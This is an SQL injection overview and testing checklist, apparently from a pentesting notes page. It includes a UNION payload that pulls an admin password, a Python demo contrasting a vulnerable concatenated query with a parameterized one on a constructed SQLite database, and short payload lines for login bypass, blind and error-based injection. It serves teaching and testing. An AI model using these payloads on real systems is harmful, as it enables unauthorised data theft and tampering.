SQL injection overview
SQL injection occurs when an attacker is able to manipulate the database queries made by an application, typically because user-supplied input is placed directly into the query text.
A simple example
A vulnerable web application has the endpoint /search?product={productName}
When a request is made, the application builds the SQL query SELECT * FROM products WHERE name='$productName' by concatenating the parameter into a string literal (which is why the payload below begins with a closing quote).
If an attacker inserts a payload into {productName}
such as anything' UNION SELECT password FROM users WHERE username = 'admin
the query is modified and sensitive data can be leaked.
The vulnerable application sends the altered query to the database, and the database returns the admin's password alongside the product results.
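An added example, not from the original page, that reproduces the search endpoint above against an in-memory SQLite database (the schema and rows are constructed here) and contrasts it with the same lookup using a bound parameter; the lookup selects a single column so that the page's one-column UNION payload lines up with it.

```python
import sqlite3

# Constructed in-memory schema and sample rows (assumed; not from the page).
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, price REAL);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
INSERT INTO users VALUES (1, 'admin', 'S3cretAdminPw'), (2, 'bob', 'hunter2');
"""

# The page's example payload: closes the string literal, then appends a UNION
# that pulls a row from a different table into the result set.
PAYLOAD = "anything' UNION SELECT password FROM users WHERE username = 'admin"


def _db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(product_name):
    """Builds the query by string concatenation, as the page's endpoint does."""
    conn = _db()
    # UNION requires matching column counts, so this variant selects only name.
    sql = "SELECT name FROM products WHERE name='" + product_name + "'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(product_name):
    """Same lookup with a bound parameter: the input is data, never query text."""
    conn = _db()
    sql = "SELECT name FROM products WHERE name=?"
    return [row[0] for row in conn.execute(sql, (product_name,))]


if __name__ == "__main__":
    print(search_vulnerable("widget"))   # ['widget']
    print(search_vulnerable(PAYLOAD))    # ['S3cretAdminPw']  the admin password leaks
    print(search_safe(PAYLOAD))          # []  the payload is just an unknown product name
```

The parameterized version returns an empty list for the payload because the driver sends the string as a value; the quote and UNION keyword never reach the SQL parser as syntax.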
Note that the payload or attack will vary with the application, the query, and the database in use. SQL injection can often lead to:
Sensitive data exposure
Data manipulation
Remote code execution
Denial of service
Other learning resources:
PortSwigger: https://portswigger.net/web-security/sql-injection
Writeups:
Have a good writeup & want to share it here? Drop me a message on LinkedIn.
Verify injection points
URL parameters
Form fields
HTTP headers (e.g. cookies)
Test ' and "
Can you trigger an error?
Can you trigger a different response?
Test with SQLmap
Test for login bypass, e.g. ' and 1=1-- - and similar payloads
Test for blind SQLi
Test for errors
Test for conditional responses
Test for conditional errors
Test for out-of-band interactions
Test for NoSQL injection
Is there a blocklist?
Can you bypass the blocklist?
Encoding
Test for second-order SQLi
# Basic login bypass
' AND 1=1#
# UNION SELECT (the number of columns must match the original query)
' UNION SELECT null,null FROM users-- -
# Blind (boolean-based: compare one character of a subquery result)
' AND SUBSTR((SELECT version()),1,1)='7'#
# Error-based: casting a text subquery result to int makes the database error message echo the value
CAST((SELECT example_column FROM example_table) AS int)
Out-of-band (e.g. data retrieved through a network interaction, such as a DNS lookup, that the database itself initiates)
Test for time delays
Alternative characters
Alternative payloads